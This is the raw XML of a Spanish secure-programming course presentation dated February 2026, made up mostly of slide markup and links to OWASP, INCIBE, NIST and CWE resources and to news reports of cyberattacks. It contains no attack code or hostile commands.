              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB8287A-CDC2-108A-6014-E62583FF879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F0BEDDC-CF66-201D-A01D-CD8588D31A45}"/>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2307707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A72B4-7825-131F-79DC-81FA846AC9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A5565DD-5E00-47E7-64E7-5D34745E95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72C5A54-83C0-AB5F-3FDE-B24BE3D66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F44AB42-82F7-6FE3-5E5A-9AB0A94F8552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7EEA22A2-499E-42F9-A64B-0A26D458712D}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>16/02/2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Marcador de pie de página 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08CBDAC1-5D91-6684-E566-84C5C8A2A70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66E0DF9-A274-EC25-6848-AC358941AA4F}"/>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3431455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64FBEEC-4B3C-D220-9DE4-0CDC6307AB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5720B98-4559-C82E-4CEF-03F7441905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7E2109-ACDA-4D9C-3E2F-3DA681C330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11D934-1DD2-4BD6-A0C6-29A9E012FCD4}" type="datetime1">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>16/02/2026</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Marcador de pie de página 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE5A232-DE49-DD55-30CA-9555090E94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34DDB291-CC43-D566-2FC6-1E17E6310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008F66-11C2-4C30-903C-023FCF629350}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2077849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0_F0E86DD8.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86.jpe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185.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41.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.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141.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId9"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owasp.org/www-project-proactive-controls/"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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.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106.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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.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4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide107.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auditoriadecodigo.com/complejidad-ciclomatica-mide-la-calidad-y-seguridad-de-tu-codigo/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ccn-cert.cni.es/series-ccn-stic/800-guia-esquema-nacional-de-seguridad/513-ccn-stic-807-criptologia-de-empleo-en-el-ens/file.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pixnio.com/es/objetos/libros/literatura-lectura-investigacion-escuela-biblioteca-estudiar-libro-de-texto-universidad-sabiduria" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.incibe.es/empresas/blog/phishing-no-muerdas-el-anzuelo" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide94.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-proactive-controls/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auditoriadecodigo.com/glosario-vocabulario-ciberseguridad-seguridad/#Minificar" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/DevSecOpsGuideline" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/system/files/documents/director/planning/report02-3.pdf" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/securityengineering/sdl" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auditoriadecodigo.com/que-es-una-auditoria-de-codigo/#Si_haces_uso_de_software_propio" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.swsec.com/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/1N3/IntruderPayloads/tree/master/FuzzLists"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4.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hyperlink" Target="https://b.socrative.com/login/student/"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194.png"/><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first.org/cvss/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cve.org/" TargetMode="Externa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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image209.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.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hyperlink" Target="https://grupooesia.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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hyperlink" Target="https://cwe.mitre.org/top25/archive/2025/2025_cwe_top25.html#top25lis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auditoriadecodigo.com/que-es-una-auditoria-de-codigo/#Si_haces_uso_de_software_propio"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nist.gov/system/files/documents/director/planning/report02-3.pdf"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0.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.sei.cmu.edu/library/asset-view.cfm?assetid=883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hyperlink" Target="https://auditoriadecodigo.com/glosario-vocabulario-ciberseguridad-seguridad/#Atributos_de_un_esquema_de_cifrado_asimetrico"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www.incibe.es/sites/default/files/contenidos/guias/doc/guia_glosario_ciberseguridad_2021.pdf"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auditoriadecodigo.com/glosario-vocabulario-ciberseguridad-seguridad/#Codificar" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auditoriadecodigo.com/rainbow-tables-como-se-crean-y-usan-las-tablas-de-cracking-de-hash-mas-potentes-explicado-facil-o-casi-facil/" TargetMode="Externa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auditoriadecodigo.com/glosario-vocabulario-ciberseguridad-seguridad/#Minificar" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://auditoriadecodigo.com/glosario-vocabulario-ciberseguridad-seguridad/#Ofuscar"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auditoriadecodigo.com/complejidad-ciclomatica-mide-la-calidad-y-seguridad-de-tu-codigo/" TargetMode="Externa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cincodias.elpais.com/cincodias/2018/08/27/midinero/1535368940_689955.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elconfidencial.com/tecnologia/2019-11-04/everis-la-ser-ciberataque-ransomware-15_2312019/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hipertextual.com/2017/05/wannacry-ransomware-ataque-telefonica" TargetMode="External"/><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elcorreo.com/sociedad/ataque-informatico-euskaltel-roban-miles-datos-clientes-20230516002649-nt.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elmundo.es/motor/2022/03/01/621df0f621efa0cc638b4593.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.h50.es/estafa-suplantan-la-web-de-vueling-ofreciendo-35-000-billetes-gratuitos/" TargetMode="External"/><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7.sv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auditoriadecodigo.com/desarrollo-de-software-seguro-ciclo-de-vida-de-desarrollo-de-software-seguro-s-sdlc/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://i.visual.ly/images/software-development-explained-with-cars_56b3abd983845_w1500.jpg"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hyperlink" Target="https://www.microsoft.com/en-us/securityengineering/sdl"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www.swsec.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.gif"/></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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data3.xml"/><Relationship Id="rId9"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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data4.xml"/><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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data5.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors6.xm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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data6.xml"/><Relationship Id="rId9"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microsoft.com/office/2018/10/relationships/comments" Target="../comments/modernComment_12B_18AF947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png"/><Relationship Id="rId7"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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.pn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OWASP/DevSecOpsGuideline" TargetMode="Externa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auditoriadecodigo.com/los-diferentes-stakeholders-interesados-participantes-en-un-desarrollo-de-software-seguro-devsecop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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId12"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5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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors7.xm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diagramQuickStyle" Target="../diagrams/quickStyle7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout7.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data7.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors8.xm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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors9.xm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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors10.xm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5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors11.xm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4.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5.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hyperlink" Target="https://owasp.org/www-project-top-ten/"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12.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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/?id=1050"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hyperlink" Target="https://example.com/?id=525" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/app/admin_getappInfo" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/app/getappInfo" TargetMode="External"/><Relationship Id="rId9"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://culturacientifica.com/2016/05/11/una-maquina-enigma-molecular/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.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5.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https://www.ccn-cert.cni.es/series-ccn-stic/800-guia-esquema-nacional-de-seguridad/513-ccn-stic-807-criptologia-de-empleo-en-el-ens/file.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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29.jpe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3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11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.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34.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.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github.com/1N3/IntruderPayloads/tree/master/FuzzLis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22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.pn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13.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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.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40.jpe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22.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13.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5.png"/><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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nonperfect.com/2016/05/02/el-cedazo/"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5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastoralsj.org/creer/1799-ante-la-tirania-de-la-seguridad" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.jpe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5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide89.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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.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150.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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8.jpe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57.jpe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9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60.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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image158.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/M%C3%A1quina_de_escribir" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.jpe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5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zorroxmundo.com/pasaporte-que-es-y-como-surgio-nuestro-documento-favorito/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.jpe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5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://askleo.com/how-do-i-find-out-whos-trying-to-change-my-password/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.jpe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69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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74.jpe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9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78.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9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81.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22.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82.png"/><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84.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hyperlink" Target="https://www.publicdomainpictures.net/view-image.php?image=228802&amp;picture=stop-sign-isolated-on-white" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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330"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>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FA564B0A-D13B-2FE1-EAA7-633B2965D160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2705" y="863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FFFA93E-A181-817D-45E3-F3AD4623815B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119624" y="3437630"/>
            <a:ext cx="6217920" cy="2062103"/>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DESARROLLO SEGURO:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Curso básico de programación segura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Conector recto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11A7610F-8857-2856-0736-C23D4156201E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665472" y="6004858"/>
            <a:ext cx="6062472" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8BFFD3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4EF75D-6EDD-3744-531B-064EB275F831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767914" y="1683304"/>
            <a:ext cx="3266387" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2EFFAA0-E17C-C1D6-1DCE-5EE2B6E33F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9837395" y="6126998"/>
            <a:ext cx="1771639" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>FEBRERO 2026</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Google Shape;110;p47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14710F58-482A-D520-B057-9DDABA2178C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8401787" y="644677"/>
            <a:ext cx="2874246" cy="1119204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Imagen 1" descr="Texto, Logotipo&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB465D39-9497-C19A-9EB9-D7ABA26D9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545" y="514324"/>
            <a:ext cx="3894078" cy="1063434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4041764312"/>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CD2AA-FB7B-7346-167C-E7FF8C49767A}"/>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A9AF2BA-676C-924A-6B59-4C697D6DAF34}"/>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7AFC26B-AF4A-047A-8532-1E5885DDD173}"/>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Requisitos mínimos de seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14DEDAF5-7837-5B69-448A-EED2E14BC43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C68CB092-E1F1-E51F-3CD8-52FBEC352397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1701161" y="1856207"/>
            <a:ext cx="5347579" cy="1156739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFF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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flecha: cheurón 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
